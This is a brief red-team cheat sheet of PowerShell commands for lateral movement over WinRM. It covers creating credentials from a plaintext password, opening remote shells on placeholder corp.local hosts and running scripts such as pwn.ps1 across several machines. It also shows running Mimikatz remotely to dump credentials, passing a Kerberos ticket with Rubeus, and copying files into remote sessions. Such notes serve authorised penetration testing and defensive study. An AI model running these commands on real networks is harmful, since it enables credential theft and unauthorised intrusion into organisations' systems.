PSRemoting Lateral Movement

05.06.2024 ยท dadevel

Lateral Movement over WinRM.

Create credential.

$c = New-Object System.Management.Automation.PSCredential -ArgumentList ('jdoe', (ConvertTo-SecureString 'passw0rd' -AsPlainText -Force))

Open interactive shell on remote system.

Enter-PSSession -Credential $c -ComputerName srv01.corp.local

Execute command on multiple systems at once.

Invoke-Command -Credential $c -ComputerName srv01.corp.local,srv02.corp.local -ScriptBlock {hostname;whoami;}

Execute script on multiple systems.

Invoke-Command -Credential $c -ComputerName srv01.corp.local,srv01.corp.local -File .\pwn.ps1

Execute local function on remote system.

Import-Module .\mimikatz.ps1
Invoke-Command -Credential $c -ComputerName srv01.corp.local -ScriptBlock ${function:Invoke-Mimikatz} -ArgumentList DumpCreds

Reuse sessions.

$s = New-PSSession -Credential $c -ComputerName srv01.corp.local
Invoke-Command -Session $s -ScriptBlock {hostname;}
Invoke-Command -Session $s -ScriptBlock {whoami;}

Establish session with Kerberos authentication.

$s = New-PSSession -Authentication Kerberos -Computer srv01.corp.local
Invoke-Command -Session $s -ScriptBlock {hostname;whoami;}

Establish session trough pass the ticket.

.\rubeus.exe ptt /ticket:%BASE64KIRBI%
Invoke-Command -ScriptBlock {whoami} -ComputerName srv01.corp.local -Authentication NegotiateWithImplicitCredential

Copy file.

Copy-Item -Path .\local.txt -ToSession $s -Destination C:\Users\jdoe\remote.txt

Note: PSRemoting seems to be unsupported in Powershell on Linux.

References: